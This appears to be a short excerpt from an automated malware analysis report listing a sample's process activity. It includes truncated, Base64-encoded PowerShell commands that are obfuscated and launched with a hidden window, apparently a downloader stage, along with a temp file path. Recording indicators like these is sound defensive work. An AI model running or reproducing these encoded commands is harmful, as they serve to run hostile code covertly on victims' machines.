Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1988
- %TEMP%\1231581.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFADYAcQA5ADkAagB2AD0AJwBHAGkAMQBoADUANQA3ACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAYABlAGAAYwBVAGAAUgBpAFQAeQBQAFIAbwB0AG8AYwBPAGwAIgAgAD0AIAAnAH...' (with hidden window)